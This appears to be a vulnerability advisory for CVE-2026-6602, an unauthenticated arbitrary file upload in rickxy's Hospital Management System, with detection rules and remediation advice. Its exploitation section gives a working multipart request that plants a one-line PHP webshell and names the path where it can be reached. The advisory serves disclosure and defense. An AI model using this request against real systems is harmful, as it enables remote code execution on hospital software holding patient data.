Technical Analysis
The application blindly trusts the Content-Type header and fails to validate the file extension. By sending a multipart/form-data request, an attacker can bypass all intended access controls.
CVE-2026-6602: Arbitrary File Upload in rickxy Hospital Management System
Overview
Section titled “Overview”I observed a critical security flaw in the HMS developed by rickxy. This vulnerability, tracked as CVE-2026-6602, allows an unauthenticated attacker to perform an AFU to achieve RCE.
Vulnerability Details
Section titled “Vulnerability Details”The flaw is located in /backend/admin/his_admin_account.php. The application lacks proper session validation and fails to restrict file types, allowing attackers to upload malicious scripts via the ad_dpic parameter.
Exploitation
Section titled “Exploitation”Analysis indicates that the following request achieves code execution:
POST /backend/admin/his_admin_account.php HTTP/1.1Content-Type: multipart/form-data; boundary=aaa
--aaaContent-Disposition: form-data; name="update_profile"1--aaaContent-Disposition: form-data; name="ad_dpic"; filename="shell.php"Content-Type: application/x-php
<?php system($_GET['cmd']); ?>--aaa--The resulting webshell is accessible at /backend/admin/assets/images/users/shell.php.
Forensic Artifacts
Section titled “Forensic Artifacts”During an incident response engagement involving this CVE, look for:
- Unusual POST requests to
/backend/admin/his_admin_account.php. - Files created in
/backend/admin/assets/images/users/with.phpor.phtmlextensions.
Detection Logic
Section titled “Detection Logic”Sigma Rule
Section titled “Sigma Rule”title: Potential Unrestricted File Upload in Hospital Management Systemstatus: experimentaldescription: Detects exploitation of CVE-2026-6602.logsource: category: web_serverdetection: selection_post: method: POST url|endswith: '/backend/admin/his_admin_account.php' selection_get: method: GET url|contains: '/backend/admin/assets/images/users/' url|endswith: '.php' condition: selection_post or selection_getlevel: criticalKQL Query (Sentinel)
Section titled “KQL Query (Sentinel)”let vulnerable_endpoint = "/backend/admin/his_admin_account.php";let upload_directory = "/backend/admin/assets/images/users/";WebAccessLogs| where (HttpVerb == "POST" and Url has vulnerable_endpoint)or (HttpVerb == "GET" and Url has upload_directory and Url matches regex @"\.(php|phtml|php5)$")| summarize count() by ClientIp, Url, HttpVerb, bin(TimeGenerated, 5m)Remediation
Section titled “Remediation”- Implement strict server-side file extension whitelisting.
- Validate file content using
finfo_fileorgetimagesize. - Disable script execution in the upload directory via web server configuration.
- Rename all uploaded files with a non-predictable identifier.